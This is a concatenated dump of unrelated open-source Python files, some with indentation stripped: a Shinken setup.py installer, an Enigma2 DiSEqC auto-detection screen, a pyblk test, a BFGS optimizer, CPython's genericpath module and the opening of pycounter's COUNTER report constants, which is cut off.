shinken_user=%s
shinken_group=%s
workdir=%s
lock_file=%s/arbiterd.pid
local_log=%s/arbiterd.log
""" % (self.owner, self.group, self.var_path, self.run_path, self.log_path)
)
        # UPDATE other cfg files too
for name in additionnal_config_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
update_file_with_string(inname, outname,
"/usr/local/shinken/var", self.var_path)
# And update the default log path too
log.info('updating log path in %s', outname)
update_file_with_string(inname, outname,
"shinken.log",
"%s/shinken.log" % self.log_path)
class install_config(Command):
description = "install the shinken config files"
user_options = [
('install-dir=', 'd', "directory to install config files to"),
('build-dir=', 'b', "build directory (where to install from)"),
('force', 'f', "force installation (overwrite existing files)"),
('skip-build', None, "skip the build steps"),
]
boolean_options = ['force', 'skip-build']
def initialize_options(self):
self.build_dir = None
self.force = None
self.skip_build = None
self.owner = None
self.group = None
self.root = None
self.etc_path = None # typically /etc on Posix systems
self.var_path = None # typically /var on Posix systems
self.run_path = None # typically /etc on Posix systems
self.log_path = None # typically /var on Posix systems
self.plugins_path = None # typically /libexec on Posix systems
def finalize_options(self):
self.set_undefined_options(
'build',
('build_config', 'build_dir'),
)
self.set_undefined_options(
'install',
('root', 'root'),
('etc_path', 'etc_path'),
('var_path', 'var_path'),
('run_path', 'run_path'),
('log_path', 'log_path'),
('plugins_path', 'plugins_path'),
('owner', 'owner'),
('group', 'group')
)
def run(self):
# If we are just doing an update, pass this
if is_update:
return
#log.warn('>>> %s', self.lib)
log.warn('>>> %s', self.etc_path)
if not self.skip_build:
self.run_command('build_config')
etc_path = self.etc_path
if self.root:
etc_path = change_root(self.root, self.etc_path)
self.outfiles = self.copy_tree(self.build_dir, etc_path)
# if root is set, it's for pacakge, so NO chown
if pwd and not self.root:
# assume a posix system
uid = self.get_uid(self.owner)
gid = self.get_gid(self.group)
for file in self.get_outputs():
log.info("Changing owner of %s to %s:%s", file, self.owner, self.group)
if not self.dry_run:
os.chown(file, uid, gid)
# recursivly changing permissions for etc/shinken and var/lib/shinken
self.recursive_chown(self.etc_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.var_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.run_path, uid, gid, self.owner, self.group)
self.recursive_chown(self.log_path, uid, gid, self.owner, self.group)
def get_inputs (self):
return self.distribution.configs or []
def get_outputs(self):
return self.outfiles or []
def recursive_chown(self, path, uid, gid, owner, group):
log.info("Changing owner of %s to %s:%s", path, owner, group)
if not self.dry_run:
os.chown(path, uid, gid)
for dirname, dirs, files in os.walk(path):
for path in itertools.chain(dirs, files):
path = os.path.join(dirname, path)
os.chown(path, uid, gid)
@staticmethod
def get_uid(user_name):
try:
return pwd.getpwnam(user_name)[2]
except KeyError, exp:
raise DistutilsOptionError("The user %s is unknown. "
"Maybe you should create this user"
% user_name)
@staticmethod
def get_gid(group_name):
try:
return grp.getgrnam(group_name)[2]
except KeyError, exp:
raise DistutilsOptionError("The group %s is unknown. "
"Maybe you should create this group"
% group_name)
def ensure_dir_exist(f):
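    """Create the directory that will contain f, if it does not exist yet."""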
dirname = os.path.dirname(f)
if not os.path.exists(dirname):
os.makedirs(dirname)
def append_file_with(infilename, outfilename, append_string):
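    """Copy infilename to outfilename, appending append_string at the end."""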
f = open(infilename)
buf = f.read()
f.close()
ensure_dir_exist(outfilename)
f = open(outfilename, "w")
f.write(buf)
f.write('\n')
f.write(append_string)
f.close()
def gen_data_files(*dirs):
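    """Walk the given directories and return every file path found under them."""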
results = []
for src_dir in dirs:
#print "Getting all files from", src_dir
for root, dirs, files in os.walk(src_dir):
for file in files:
results.append(os.path.join(root, file))
return results
def update_file_with_string(infilename, outfilename, match, new_string):
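    """Copy infilename to outfilename, replacing every occurrence of match
    with new_string."""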
f = open(infilename)
buf = f.read()
f.close()
buf = buf.replace(match, new_string)
f = open(outfilename, "w")
f.write(buf)
f.close()
# Set the default values for the paths
if 'win' in sys.platform:
default_paths = {'var': "c:\\shinken\\var",
'etc': "c:\\shinken\\etc",
'log': "c:\\shinken\\var",
'run': "c:\\shinken\\var",
'libexec': "c:\\shinken\\libexec",
}
elif 'linux' in sys.platform or 'sunos5' in sys.platform:
default_paths = {'var': "/var/lib/shinken/",
'etc': "/etc/shinken",
'run': "/var/run/shinken",
'log': "/var/log/shinken",
'libexec': "/usr/lib/shinken/plugins",
}
elif 'bsd' in sys.platform or 'dragonfly' in sys.platform:
default_paths = {'var': "/var/lib/shinken",
'etc': "/usr/local/etc/shinken",
'run': "/var/run/shinken",
'log': "/var/log/shinken",
'libexec': "/usr/local/libexec/shinken",
}
else:
raise "Unsupported platform, sorry"
required_pkgs = ['pycurl']
etc_root = os.path.dirname(default_paths['etc'])
var_root = os.path.dirname(default_paths['var'])
# nagios/shinken global config
main_config_files = ('shinken.cfg',)
additionnal_config_files = (
'skonf.cfg',
)
config_objects_file = (
'discovery_runs.cfg',
'templates.cfg',
'dependencies.cfg',
'timeperiods.cfg',
'time_templates.cfg',
'contacts.cfg',
'discovery_rules.cfg',
'hosts/localhost.cfg',
'services/services.cfg',
'contactgroups.cfg',
'escalations.cfg',
'commands.cfg',
'discovery.cfg',
'servicegroups.cfg',
'hostgroups.cfg',
'certs/server.pem',
'certs/client.pem',
'certs/ca.pem',
)
#print "SRV PACK FILES", srv_pack_files
config_objects_file_extended = list(config_objects_file)
all_etc_files = []
# Do not put daemons in this list, because it will override other modifications
for p in ['packs', 'arbiters', 'brokers', 'modules',
'pollers', 'reactionners', 'realms', 'receivers', 'schedulers']:
# Get all files in this dir
_files = gen_data_files('etc/%s' % p)
# We must remove the etc from the paths
_files = [s.replace('etc/', '') for s in _files]
    # Declare them in the global list now
config_objects_file_extended.extend(_files)
# Now service packs files
#srv_pack_files = gen_data_files('etc/packs')
# We must remove the etc from the paths
#srv_pack_files = [s.replace('etc/', '') for s in srv_pack_files]
#config_objects_file_extended.extend(srv_pack_files)
# Setup ins waiting for a tuple....
config_objects_file = tuple(config_objects_file_extended)
print config_objects_file
# daemon configs
daemon_ini_files = (('broker', 'daemons/brokerd.ini'),
('receiver', 'daemons/receiverd.ini'),
('poller', 'daemons/pollerd.ini'),
('reactionner', 'daemons/reactionnerd.ini'),
('scheduler', 'daemons/schedulerd.ini'),
)
resource_cfg_files = ('resource.cfg',)
# Ok, for the webui files it's a bit tricky. We need to add all of them in
# the package_data of setup(), but from the point of view of the
# shinken module, so the directory shinken... but without moving from pwd!
# So: sorry for the replace, really... I HATE SETUP()!
full_path_webui_files = gen_data_files('shinken/webui')
webui_files = [s.replace('shinken/webui/', 'webui/') for s in full_path_webui_files]
package_data = ['*.py', 'modules/*.py', 'modules/*/*.py']
package_data.extend(webui_files)
#By default we add all init.d scripts and some dummy files
data_files = [
(
os.path.join('/etc', 'init.d'),
['bin/init.d/shinken',
'bin/init.d/shinken-arbiter',
'bin/init.d/shinken-broker',
'bin/init.d/shinken-receiver',
'bin/init.d/shinken-poller',
'bin/init.d/shinken-reactionner',
'bin/init.d/shinken-scheduler',
'bin/init.d/shinken-skonf',
]
)
]
# If not update, we install configuration files too
if not is_update:
data_files.append(
(os.path.join(etc_root, 'default',),
['build/bin/default/shinken']
))
# Also add modules to the var directory
for p in gen_data_files('modules'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# Also add share files to the var directory
for p in gen_data_files('share'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# Also add cli files to the var directory
for p in gen_data_files('cli'):
_path, _file = os.path.split(p)
data_files.append( (os.path.join(var_root, _path), [p]))
# compute scripts
scripts = [ s for s in glob('bin/shinken*') if not s.endswith('.py')]
print "All package _data"
if __name__ == "__main__":
setup(
cmdclass={
'build': build,
'install': install,
'build_config': build_config,
'install_config': install_config
},
name="Shinken",
version="1.4",
packages=find_packages(),
package_data={'': package_data},
description="Shinken is a monitoring tool compatible with Nagios configuration and plugins",
long_description=read('README'),
author="Gabes Jean",
author_email="[email protected]",
license="GNU Affero General Public License",
url="http://www.shinken-monitoring.org",
zip_safe=False,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU Affero General Public License v3',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX',
'Programming Language :: Python',
'Topic :: System :: Monitoring',
'Topic :: System :: Networking :: Monitoring',
],
install_requires=[
required_pkgs
],
extras_require={
'setproctitle': ['setproctitle']
},
scripts=scripts,
data_files=data_files,
)
print "Shinken setup done"
| agpl-3.0 | 2,659,924,417,819,032,600 | 33.978788 | 100 | 0.560643 | false |
popazerty/dvbapp2-gui | lib/python/Screens/AutoDiseqc.py | 1 | 8796 | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.ActionMap import ActionMap
from Components.Sources.StaticText import StaticText
from Components.config import config, configfile, getConfigListEntry
from Components.NimManager import nimmanager, InitNimManager
from Components.TuneTest import Tuner
from enigma import eDVBFrontendParametersSatellite, eDVBResourceManager, eTimer
class AutoDiseqc(Screen, ConfigListScreen):
diseqc_ports = [
"A", "B", "C", "D"
]
sat_frequencies = [
# astra 282 S4C
( 12051, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_2_3, \
eDVBFrontendParametersSatellite.Inversion_Off, 282, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
2018, 2, "Astra 2 28.2e"),
# astra 235 astra ses
( 12168, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_3_4, \
eDVBFrontendParametersSatellite.Inversion_Off, 235, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
3224, 3, "Astra 3 23.5e"),
# astra 192 zdf
( 11953, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Horizontal, eDVBFrontendParametersSatellite.FEC_3_4, \
eDVBFrontendParametersSatellite.Inversion_Off, 192, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
1079, 1, "Astra 1 19.2e"),
# hotbird 130 rai
( 10992, 27500, \
eDVBFrontendParametersSatellite.Polarisation_Vertical, eDVBFrontendParametersSatellite.FEC_2_3, \
eDVBFrontendParametersSatellite.Inversion_Off, 130, \
eDVBFrontendParametersSatellite.System_DVB_S, eDVBFrontendParametersSatellite.Modulation_Auto, \
eDVBFrontendParametersSatellite.RollOff_auto, eDVBFrontendParametersSatellite.Pilot_Unknown, \
12400, 318, "Hotbird 13.0e"),
]
SAT_TABLE_FREQUENCY = 0
SAT_TABLE_SYMBOLRATE = 1
SAT_TABLE_POLARISATION = 2
SAT_TABLE_FEC = 3
SAT_TABLE_INVERSION = 4
SAT_TABLE_ORBPOS = 5
SAT_TABLE_SYSTEM = 6
SAT_TABLE_MODULATION = 7
SAT_TABLE_ROLLOFF = 8
SAT_TABLE_PILOT = 9
SAT_TABLE_TSID = 10
SAT_TABLE_ONID = 11
SAT_TABLE_NAME = 12
def __init__(self, session, feid, nr_of_ports, simple_tone, simple_sat_change):
Screen.__init__(self, session)
self["statusbar"] = StaticText(" ")
self["tunerstatusbar"] = StaticText(" ")
self.list = []
ConfigListScreen.__init__(self, self.list, session = self.session)
self["config"].list = self.list
self["config"].l.setList(self.list)
self["key_red"] = StaticText(_("Abort"))
self.index = 0
self.port_index = 0
self.feid = feid
self.nr_of_ports = nr_of_ports
self.simple_tone = simple_tone
self.simple_sat_change = simple_sat_change
self.found_sats = []
if not self.openFrontend():
self.oldref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.session.nav.stopService()
if not self.openFrontend():
if self.session.pipshown:
self.session.pipshown = False
del self.session.pip
if not self.openFrontend():
self.frontend = None
self["actions"] = ActionMap(["SetupActions"],
{
"cancel": self.keyCancel,
}, -2)
self.count = 0
self.state = 0
self.abort = False
self.statusTimer = eTimer()
self.statusTimer.callback.append(self.statusCallback)
self.tunerStatusTimer = eTimer()
self.tunerStatusTimer.callback.append(self.tunerStatusCallback)
self.startStatusTimer()
def keyCancel(self):
self.abort = True
def keyOK(self):
return
def keyLeft(self):
return
def keyRight(self):
return
def openFrontend(self):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
self.raw_channel = res_mgr.allocateRawChannel(self.feid)
if self.raw_channel:
self.frontend = self.raw_channel.getFrontend()
if self.frontend:
return True
return False
def statusCallback(self):
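		# state 0: write the simple DiSEqC config for the port under test and save it;
		# state 1: re-init the NIM manager, retune, and start polling the tuner status.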
if self.state == 0:
if self.port_index == 0:
self.clearNimEntries()
config.Nims[self.feid].diseqcA.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 1:
self.clearNimEntries()
config.Nims[self.feid].diseqcB.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 2:
self.clearNimEntries()
config.Nims[self.feid].diseqcC.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
elif self.port_index == 3:
self.clearNimEntries()
config.Nims[self.feid].diseqcD.value = "%d" % (self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS])
if self.nr_of_ports == 4:
config.Nims[self.feid].diseqcMode.value = "diseqc_a_b_c_d"
elif self.nr_of_ports == 2:
config.Nims[self.feid].diseqcMode.value = "diseqc_a_b"
else:
config.Nims[self.feid].diseqcMode.value = "single"
config.Nims[self.feid].configMode.value = "simple"
config.Nims[self.feid].simpleDiSEqCSetVoltageTone = self.simple_tone
config.Nims[self.feid].simpleDiSEqCOnlyOnSatChange = self.simple_sat_change
self.saveAndReloadNimConfig()
self.state += 1
elif self.state == 1:
InitNimManager(nimmanager)
self.tuner = Tuner(self.frontend)
self.tuner.tune(self.sat_frequencies[self.index])
self["statusbar"].setText(_("Checking tuner %d\nDiSEqC port %s for %s") % (self.feid, self.diseqc_ports[self.port_index], self.sat_frequencies[self.index][self.SAT_TABLE_NAME]))
self["tunerstatusbar"].setText(" ")
self.count = 0
self.state = 0
self.startTunerStatusTimer()
return
self.startStatusTimer()
def startStatusTimer(self):
self.statusTimer.start(100, True)
def setupSave(self):
self.clearNimEntries()
for x in self.found_sats:
if x[0] == "A":
config.Nims[self.feid].diseqcA.value = "%d" % (x[1])
elif x[0] == "B":
config.Nims[self.feid].diseqcB.value = "%d" % (x[1])
elif x[0] == "C":
config.Nims[self.feid].diseqcC.value = "%d" % (x[1])
elif x[0] == "D":
config.Nims[self.feid].diseqcD.value = "%d" % (x[1])
self.saveAndReloadNimConfig()
def setupClear(self):
self.clearNimEntries()
self.saveAndReloadNimConfig()
def clearNimEntries(self):
config.Nims[self.feid].diseqcA.value = "3601"
config.Nims[self.feid].diseqcB.value = "3601"
config.Nims[self.feid].diseqcC.value = "3601"
config.Nims[self.feid].diseqcD.value = "3601"
def saveAndReloadNimConfig(self):
config.Nims[self.feid].save()
configfile.save()
configfile.load()
nimmanager.sec.update()
def tunerStatusCallback(self):
dict = {}
self.frontend.getFrontendStatus(dict)
if dict["tuner_state"] == "TUNING":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("TUNING"))
elif dict["tuner_state"] == "LOCKED":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("ACQUIRING TSID/ONID"))
self.raw_channel.requestTsidOnid(self.gotTsidOnid)
elif dict["tuner_state"] == "LOSTLOCK" or dict["tuner_state"] == "FAILED":
self["tunerstatusbar"].setText(_("Tuner status:") + " " + _("FAILED"))
self.tunerStopScan(False)
return
self.count += 1
if self.count > 15:
self.startStatusTimer()
else:
self.startTunerStatusTimer()
def startTunerStatusTimer(self):
self.tunerStatusTimer.start(2000, True)
def gotTsidOnid(self, tsid, onid):
self.tunerStatusTimer.stop()
if tsid == self.sat_frequencies[self.index][self.SAT_TABLE_TSID] and onid == self.sat_frequencies[self.index][self.SAT_TABLE_ONID]:
self.tunerStopScan(True)
else:
self.tunerStopScan(False)
def tunerStopScan(self, result):
if self.abort:
self.setupClear()
self.close(False)
return
if result:
self.found_sats.append((self.diseqc_ports[self.port_index], self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS], self.sat_frequencies[self.index][self.SAT_TABLE_NAME]))
self.index = 0
self.port_index += 1
else:
self.index += 1
if len(self.sat_frequencies) == self.index:
self.index = 0
self.port_index += 1
if len(self.found_sats) > 0:
self.list = []
for x in self.found_sats:
self.list.append(getConfigListEntry((_("DiSEqC port %s: %s") % (x[0], x[2]))))
self["config"].l.setList(self.list)
if self.nr_of_ports == self.port_index:
self.state = 99
self.setupSave()
self.close(len(self.found_sats) > 0)
return
for x in self.found_sats:
if x[1] == self.sat_frequencies[self.index][self.SAT_TABLE_ORBPOS]:
self.tunerStopScan(False)
return
self.startStatusTimer()
| gpl-2.0 | -2,929,560,875,584,802,300 | 31.338235 | 180 | 0.713847 | false |
mulkieran/pyblk | tests/test_utils.py | 1 | 1744 | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
# Red Hat Author(s): Anne Mulhern <[email protected]>
"""
tests.test_utils
================
Tests utilities.
.. moduleauthor:: mulhern <[email protected]>
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import pyblk
from ._constants import GRAPH
class TestGraphUtils(object):
"""
Test utilities that work over networkx graphs.
"""
# pylint: disable=too-few-public-methods
def test_roots(self):
"""
Verify that roots are really roots.
"""
roots = pyblk.GraphUtils.get_roots(GRAPH)
in_degrees = GRAPH.in_degree(roots)
assert all(in_degrees[r] == 0 for r in roots)
| gpl-2.0 | -5,400,782,520,455,736,000 | 32.538462 | 77 | 0.706995 | false |
eljost/pysisyphus | deprecated/optimizers/BFGS.py | 1 | 4901 | #!/usr/bin/env python3
import matplotlib.pyplot as plt
import numpy as np
from pysisyphus.helpers import fit_rigid, procrustes
from pysisyphus.optimizers.BacktrackingOptimizer import BacktrackingOptimizer
# [1] Nocedal, Wright - Numerical Optimization, 2006
class BFGS(BacktrackingOptimizer):
def __init__(self, geometry, alpha=1.0, bt_force=20, **kwargs):
super(BFGS, self).__init__(geometry, alpha=alpha,
bt_force=bt_force,
**kwargs)
self.eye = np.eye(len(self.geometry.coords))
try:
self.inv_hessian = self.geometry.get_initial_hessian()
# ChainOfStates objects may not have get_initial_hessian
except AttributeError:
self.inv_hessian = self.eye.copy()
if (hasattr(self.geometry, "internal")
and (self.geometry.internal is not None)):
raise Exception("Have to add hessian projections etc.")
self.log("BFGS with align=True is somewhat broken right now, so "
"the images will be aligned only in the first iteration. "
)
def reset_hessian(self):
self.inv_hessian = self.eye.copy()
self.log("Resetted hessian")
def prepare_opt(self):
if self.is_cos and self.align:
procrustes(self.geometry)
# Calculate initial forces before the first iteration
self.coords.append(self.geometry.coords)
self.forces.append(self.geometry.forces)
self.energies.append(self.geometry.energy)
def scale_by_max_step(self, steps):
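        # Uniformly rescale the step vector so that its largest absolute
        # component does not exceed self.max_step.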
steps_max = np.abs(steps).max()
if steps_max > self.max_step:
fact = self.max_step / steps_max
"""
fig, ax = plt.subplots()
ax.hist(steps, bins=20)#"auto")
title = f"max(steps)={steps_max:.04f}, fact={fact:.06f}"
ax.set_title(title)
l1 = ax.axvline(x=self.max_step, c="k")
l2 = ax.axvline(x=-self.max_step, c="k")
ax.add_artist(l1)
ax.add_artist(l2)
fig.savefig(f"cycle_{self.cur_cycle:02d}.png")
plt.close(fig)
"""
steps *= self.max_step / steps_max
return steps
def optimize(self):
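        # One BFGS cycle: take a damped quasi-Newton step, backtrack if the
        # new forces got worse, then update the inverse Hessian (cf. [1]).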
last_coords = self.coords[-1]
last_forces = self.forces[-1]
last_energy = self.energies[-1]
unscaled_steps = self.inv_hessian.dot(last_forces)
steps = self.scale_by_max_step(self.alpha*unscaled_steps)
new_coords = last_coords + steps
self.geometry.coords = new_coords
# Hessian rotation seems faulty right now ...
#if self.is_cos and self.align:
# (last_coords, last_forces, steps), _, self.inv_hessian = fit_rigid(
# self.geometry,
# (last_coords,
# last_forces,
# steps),
# hessian=self.inv_hessian)
new_forces = self.geometry.forces
new_energy = self.geometry.energy
skip = self.backtrack(new_forces, last_forces, reset_hessian=True)
if skip:
self.reset_hessian()
self.geometry.coords = last_coords
#self.scale_alpha(unscaled_steps, self.alpha)
return None
# Because we add the step later on we restore the original
# coordinates and set the appropriate energies and forces.
self.geometry.coords = last_coords
self.geometry.forces = new_forces
self.geometry.energy = new_energy
self.forces.append(new_forces)
self.energies.append(new_energy)
# [1] Eq. 6.5, gradient difference, minus force difference
y = -(new_forces - last_forces)
sigma = new_coords - last_coords
# [1] Eq. 6.7, curvature condition
curv_cond = sigma.dot(y)
if curv_cond < 0:
self.log(f"curvature condition {curv_cond:.07} < 0!")
rho = 1.0 / y.dot(sigma)
if ((np.array_equal(self.inv_hessian, self.eye))
# When align = True the above expression will evaluate to
# False. So we also check if we are in the first iteration.
or (self.cur_cycle == 0)):
# [1] Eq. 6.20, p. 143
beta = y.dot(sigma)/y.dot(y)
self.inv_hessian = self.eye*beta
self.log(f"Using initial guess for inverse hessian, beta={beta}")
# Inverse hessian update
A = self.eye - np.outer(sigma, y) * rho
B = self.eye - np.outer(y, sigma) * rho
self.inv_hessian = (A.dot(self.inv_hessian).dot(B)
+ np.outer(sigma, sigma) * rho)
return steps
| gpl-3.0 | -1,036,933,543,861,177,100 | 39.504132 | 86 | 0.550296 | false |
ArcherSys/ArcherSys | Lib/genericpath.py | 1 | 3883 |
"""
Path operations common to more than one OS
Do not use directly. The OS specific modules import the appropriate
functions from this module themselves.
"""
import os
import stat
__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',
'getsize', 'isdir', 'isfile', 'samefile', 'sameopenfile',
'samestat']
# Does a path exist?
# This is false for dangling symbolic links on systems that support them.
def exists(path):
"""Test whether a path exists. Returns False for broken symbolic links"""
try:
os.stat(path)
except OSError:
return False
return True
# This follows symbolic links, so both islink() and isdir() can be true
# for the same path on systems that support symlinks
def isfile(path):
"""Test whether a path is a regular file"""
try:
st = os.stat(path)
except OSError:
return False
return stat.S_ISREG(st.st_mode)
# Is a path a directory?
# This follows symbolic links, so both islink() and isdir()
# can be true for the same path on systems that support symlinks
def isdir(s):
"""Return true if the pathname refers to an existing directory."""
try:
st = os.stat(s)
except OSError:
return False
return stat.S_ISDIR(st.st_mode)
def getsize(filename):
"""Return the size of a file, reported by os.stat()."""
return os.stat(filename).st_size
def getmtime(filename):
"""Return the last modification time of a file, reported by os.stat()."""
return os.stat(filename).st_mtime
def getatime(filename):
"""Return the last access time of a file, reported by os.stat()."""
return os.stat(filename).st_atime
def getctime(filename):
"""Return the metadata change time of a file, reported by os.stat()."""
return os.stat(filename).st_ctime
# Return the longest prefix of all list elements.
def commonprefix(m):
"Given a list of pathnames, returns the longest common leading component"
if not m: return ''
s1 = min(m)
s2 = max(m)
for i, c in enumerate(s1):
if c != s2[i]:
return s1[:i]
return s1
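# For example, commonprefix(['/usr/lib', '/usr/local']) returns '/usr/l':
# the comparison is character-by-character, not path-component-aware.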
# Are two stat buffers (obtained from stat, fstat or lstat)
# describing the same file?
def samestat(s1, s2):
"""Test whether two stat buffers reference the same file"""
return (s1.st_ino == s2.st_ino and
s1.st_dev == s2.st_dev)
# Are two filenames really pointing to the same file?
def samefile(f1, f2):
"""Test whether two pathnames reference the same actual file"""
s1 = os.stat(f1)
s2 = os.stat(f2)
return samestat(s1, s2)
# Are two open files really referencing the same file?
# (Not necessarily the same file descriptor!)
def sameopenfile(fp1, fp2):
"""Test whether two open file objects reference the same file"""
s1 = os.fstat(fp1)
s2 = os.fstat(fp2)
return samestat(s1, s2)
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
# Generic implementation of splitext, to be parametrized with
# the separators
def _splitext(p, sep, altsep, extsep):
"""Split the extension from a pathname.
Extension is everything from the last dot to the end, ignoring
leading dots. Returns "(root, ext)"; ext may be empty."""
# NOTE: This code must work for text and bytes strings.
sepIndex = p.rfind(sep)
if altsep:
altsepIndex = p.rfind(altsep)
sepIndex = max(sepIndex, altsepIndex)
dotIndex = p.rfind(extsep)
if dotIndex > sepIndex:
# skip all leading dots
filenameIndex = sepIndex + 1
while filenameIndex < dotIndex:
if p[filenameIndex:filenameIndex+1] != extsep:
return p[:dotIndex], p[dotIndex:]
filenameIndex += 1
return p, p[:0]
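# For example (with sep='/', altsep=None, extsep='.'):
#   _splitext('archive.tar.gz', '/', None, '.')  ->  ('archive.tar', '.gz')
#   _splitext('.bashrc', '/', None, '.')         ->  ('.bashrc', '')
# since leading dots of the last component never start an extension.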
| mit | -4,081,050,003,796,660,000 | 28.195489 | 78 | 0.661087 | false |
chill17/pycounter | pycounter/constants.py | 1 | 6177 | """Constants used by pycounter."""
NS = {
'SOAP-ENV': "http://schemas.xmlsoap.org/soap/envelope/",
'sushi': "http://www.niso.org/schemas/sushi",
'sushicounter': "http://www.niso.org/schemas/sushi/counter",
'counter': "http://www.niso.org/schemas/counter",
}
METRICS = {
u"JR1": u"FT Article Requests",
u"JR1 GOA": u"Gold Open Access Article Requests",
u"BR1": u"Book Title Requests",
u"BR2": u"Book Section Requests",
u"DB1": [u"Regular Searches",
u"Searches-federated and automated",
u"Result Clicks",
u"Record Views"],
u"DB2": [u"Access denied: concurrent/simultaneous user license exceeded",
u"Access denied: content item not licensed"]
}
DB_METRIC_MAP = {
"search_reg": METRICS["DB1"][0],
"search_fed": METRICS["DB1"][1],
"result_click": METRICS["DB1"][2],
"record_view": METRICS["DB1"][3],
"turnaway": METRICS["DB2"][0],
"no_license": METRICS["DB2"][1]
}
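# e.g. DB_METRIC_MAP['search_reg'] maps to the DB1 metric label 'Regular Searches'.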
CODES = {
u"Database": u"DB",
u"Journal": u"JR",
u"Book": u"BR",
u"Title": u"TR",
u"Platform": u"PR",
u"Multimedia": u"MR",
u"Consortium": u"CR",
}
# from http://www.niso.org/workrooms/sushi/registry/
# Not all of these are actually supported by pycounter
REPORT_DESCRIPTIONS = {
u'BR1': u'Number of Successful Title Requests by Month and Title',
u'BR2': u'Number of Successful Section Requests by Month and Title',
u'BR3': u'Access Denied to Content Items by Month, Title, and Category',
u'BR4': u'Access Denied to Content Items by Month, Platform, and Category',
u'BR5': u'Total Searches by Month and Title',
u'CR1': u'Number of Successful Full-text Journal Article or Book Chapter '
u'Requests by Month',
u'CR2': u'Total Searches by Month and Database',
u'CR3': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'DB1': u'Total Searches, Result Clicks and Record Views by Month and '
u'Database',
u'DB2': u'Access Denied by Month, Database and Category',
u'JR1': u'Number of Successful Full-Text Article Requests by Month and '
u'Journal',
u'JR1GOA': u'Number of Successful Gold Open Access Full-Text Article '
u'Requests by Month and Journal',
u'JR1a': u'Number of Successful Full-Text Article Requests from an '
u'Archive by Month and Journal',
u'JR2': u'Access Denied to Full Text Articles by Month, Journal, and '
u'Category',
u'JR3': u'Number of Successful Item Requests and Turnaways by Month, '
u'Journal, and Page-Type',
u'JR3mobile': u'Number of Successful Item Requests by Month, Journal, '
u'and Page-Type for usage on a mobile device',
u'JR4': u'Total Searches Run by Month and Collection',
u'JR5': u'Number of Successful Full-Text Article Requests by '
u'Year-of-Publication (YOP) and Journal',
u'MR1': u'Number of Successful Multimedia Full Content Unit Requests '
u'by Month and Collection',
u'MR2': u'Number of Successful Multimedia Full Content Unit Requests by '
u'Month, Collection, and Item Type',
u'PR1': u'Total Searches, Result Clicks, and Record Views by Month and '
u'Platform',
u'TR1': u'Number of Successful Requests for Journal Full-Text Articles '
u'and Book Sections by Month and Title',
u'TR1mobile': u'Number of Successful Requests for Journal Full-Text '
u'Articles and Book Sections by Month and Title '
u'(formatted for normal browsers/delivered to mobile '
u'devices AND formatted for mobile devices/delivered '
u'to mobile devices)',
u'TR2': u'Access Denied to Full-Text Items by Month, Title, and Category',
u'TR3': u'Number of Successful Item Requests by Month, Title, and '
u'Page-Type',
u'TR3mobile': u'Number of Successful Item Requests by Month, Title, '
u'and Page-Type (formatted for normal browsers/delivered '
u'to mobile devices and for mobile devices/delivered to '
u'mobile devices)',
}
HEADER_FIELDS = {
"JR1": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR2": (
u'Journal',
u'Publisher',
u'Platform',
u'Journal DOI',
u'Proprietary Identifier',
u'Print ISSN',
u'Online ISSN',
u'Reporting Period Total',
u'Reporting Period HTML',
u'Reporting Period PDF',
),
"JR3": (
u'Journal',
u'Publisher',
u'Platform',
